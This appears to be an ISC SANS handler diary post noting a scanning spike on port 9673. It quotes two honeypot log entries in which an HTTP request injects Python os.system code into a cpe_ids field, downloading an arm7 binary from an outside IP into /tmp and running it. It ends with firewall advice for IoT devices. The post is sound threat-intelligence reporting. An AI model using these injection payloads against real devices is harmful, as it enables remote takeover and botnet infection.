I don't know how many of you pay attention to the Top 10 Ports graphs on your isc.sans.edu dashboard, but I do. Unfortunately, the top 10 is pretty constant, the botnets are attacking the same ports. What I find more interesting is anomalous behavior. Changes from what is normal on a given port. So, a little over a week ago, I saw a jump on a port I wasn't familiar with. In fact, when I look at the longer term, we've seen the occasional spike, but this is the first one where the number of sources was up significantly, too.
20200429-051959: 0.0.0.0:9673-197.60.52.212:59732 data b"GET /live/CPEManager/AXCampaignManager/delete_cpes_by_ids HTTP/1.1\r\nUser-Agent: XTC\r\nHost: 127.0.0.1:9673\r\nContent-Length: 1000\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\ncpe_ids=__import__('os').system('wget http://212.114.52.128/arm7 -O /tmp/viktor; chmod 777 /tmp/viktor; /tmp/viktor')\r\n\r\n" 20200430-082737: 0.0.0.0:9673-14.177.232.245:51026 data b"GET /live/CPEManager/AXCampaignManager/delete_cpes_by_ids HTTP/1.1\r\nUser-Agent: XTC\r\nHost: 127.0.0.1:9673\r\nContent-Length: 1000\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\ncpe_ids=__import__('os').system('wget http://178.33.64.107/arm7 -O /tmp/upnp.debug; chmod 777 /tmp/upnp.debug; /tmp/upnp.debug')\r\n\r\n" As we always say, your IoT devices should not generally be directly exposed to the internet. I know people are fond of saying the perimeter is dead, but seriously, you should still have a firewall that blocks inbound traffic to (at least) your IoT devices. --------------- |
Jim 423 Posts ISC Handler May 1st 2020 |
Thread locked Subscribe |
May 1st 2020 2 years ago |
Sign Up for Free or Log In to start participating in the conversation!